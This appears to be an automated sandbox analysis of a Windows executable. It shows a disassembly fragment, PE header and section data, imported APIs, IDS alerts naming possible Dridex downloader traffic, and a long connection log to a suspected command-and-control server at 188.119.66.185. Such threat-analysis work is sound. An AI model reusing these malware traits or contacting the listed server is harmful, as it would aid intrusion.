mov edx, dword ptr [ebp-10h]
mov eax, 0040CE28h
call 00007FEF691DC68Ah
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CE28h]
mov dl, 01h
mov eax, 0040738Ch
call 00007FEF691E096Ah
mov dword ptr [0040CE2Ch], eax
xor edx, edx
push ebp
push 0040AC4Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FEF691E30A6h
mov dword ptr [0040CE34h], eax
mov eax, dword ptr [0040CE34h]
cmp dword ptr [eax+0Ch], 00000000h

Data directories
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xd000          | 0x950        | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x11000         | 0x2c00       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0xf000          | 0x18         | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9d30 | 0x9e00 | c3bd95c4b1a8e5199981e0d9b45fd18c | False | 0.6052709651898734 | data | 6.631765876950794 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x250 | 0x400 | 1ee71d84f1c77af85f1f5c278f880572 | False | 0.306640625 | data | 2.751820662285145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe8c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 584d947bd36e14a84b7a6ffefbd7c61e | False | 0.32652698863636365 | data | 4.497568748493399 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4f4 | data | English | United States | 0.26735015772870663
RT_MANIFEST | 0x13570 | 0x5a4 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42590027700831024
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T14:00:02.379653+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49795 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:03.416230+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49795 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:05.316086+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49804 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:06.413497+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49804 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:08.584340+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49813 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:09.530883+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49813 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:11.311309+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49819 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:11.997868+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49819 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:13.882631+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49824 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:14.654720+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49824 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:16.573601+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49832 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:17.561270+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49832 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:19.325465+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:20.002065+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:21.766157+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49843 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:22.466431+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49843 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:24.333991+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49848 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:25.371903+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49848 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:26.975544+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49853 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:27.925819+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49853 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:29.909378+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49860 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:30.743519+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49860 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:32.931169+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49868 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:34.040700+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49868 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:35.935185+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49875 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:36.956646+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49875 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:38.547635+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49885 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:39.269197+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49885 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:40.992337+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49891 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:41.670874+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49891 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:43.262705+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49897 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:44.007513+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49897 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:45.771653+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49903 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:46.503947+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49903 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:48.542708+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49909 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:49.475698+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49909 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:51.173700+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49915 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:52.086221+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49915 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:53.662666+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49922 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:54.349196+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49922 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:56.041453+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49928 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:56.735721+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49928 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:58.823131+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49934 | 188.119.66.185 | 443 | TCP
2024-12-18T14:00:59.849002+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49934 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:01.592108+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49944 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:02.555588+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49944 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:04.322674+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49950 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:05.207393+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49950 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:07.308660+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49956 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:08.431803+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49956 | 188.119.66.185 | 443 | TCP
2024-12-18T14:01:10.190420+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 49967 | 188.119.66.185 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                      Dec 18, 2024 14:00:09.640470982 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:09.640487909 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.311245918 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.311309099 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.311817884 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.311825037 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.312027931 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.312036037 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.997840881 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.997940063 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.997956991 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.997972965 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:11.997999907 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.998022079 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.998303890 CET49819443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:11.998321056 CET44349819188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:12.108604908 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:12.108649015 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:12.108767986 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:12.109173059 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:12.109185934 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:13.882509947 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:13.882631063 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:13.883111000 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:13.883119106 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:13.883300066 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:13.883306026 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:14.654752970 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:14.654822111 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.654829979 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:14.654843092 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:14.654874086 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.654902935 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.668953896 CET49824443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.668968916 CET44349824188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:14.780853987 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.780890942 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:14.781074047 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.781313896 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:14.781326056 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:16.573514938 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:16.573601007 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:16.574053049 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:16.574062109 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:16.574223042 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:16.574228048 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:17.561400890 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:17.561486959 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.561500072 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:17.561587095 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:17.561590910 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.561634064 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.561837912 CET49832443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.561851978 CET44349832188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:17.671760082 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.671811104 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:17.671890974 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.672249079 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:17.672264099 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:19.325373888 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:19.325464964 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:19.326292038 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:19.326292992 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:19.326303005 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:19.326319933 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:20.002065897 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:20.002127886 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:20.002191067 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:20.002227068 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:20.143623114 CET49838443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:20.143649101 CET44349838188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:20.266228914 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:20.266263008 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:20.266335011 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:20.266768932 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:20.266779900 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:21.766005993 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:21.766156912 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:21.766721010 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:21.766726971 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:21.766917944 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:21.766921997 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:22.466455936 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:22.466536999 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:22.466604948 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:22.466625929 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:22.466850996 CET49843443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:22.466869116 CET44349843188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:22.578649998 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:22.578695059 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:22.578803062 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:22.579140902 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:22.579158068 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:24.333856106 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:24.333991051 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:24.334450960 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:24.334459066 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:24.334656954 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:24.334662914 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:25.371905088 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:25.371982098 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:25.371990919 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:25.372047901 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:25.372426987 CET49848443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:25.372446060 CET44349848188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:25.483733892 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:25.483781099 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:25.483855963 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:25.484138966 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:25.484150887 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:26.975440979 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:26.975543976 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:26.976043940 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:26.976052999 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:26.976252079 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:26.976258993 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:27.925827980 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:27.925873041 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:27.925882101 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:27.925918102 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:27.926542997 CET49853443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:27.926564932 CET44349853188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:28.046312094 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:28.046348095 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:28.046458960 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:28.046703100 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:28.046710014 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:29.909235954 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:29.909378052 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:29.909995079 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:29.910003901 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:29.910176039 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:29.910181046 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:30.743566990 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:30.743645906 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:30.743813992 CET49860443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:30.744075060 CET49860443192.168.2.7188.119.66.185
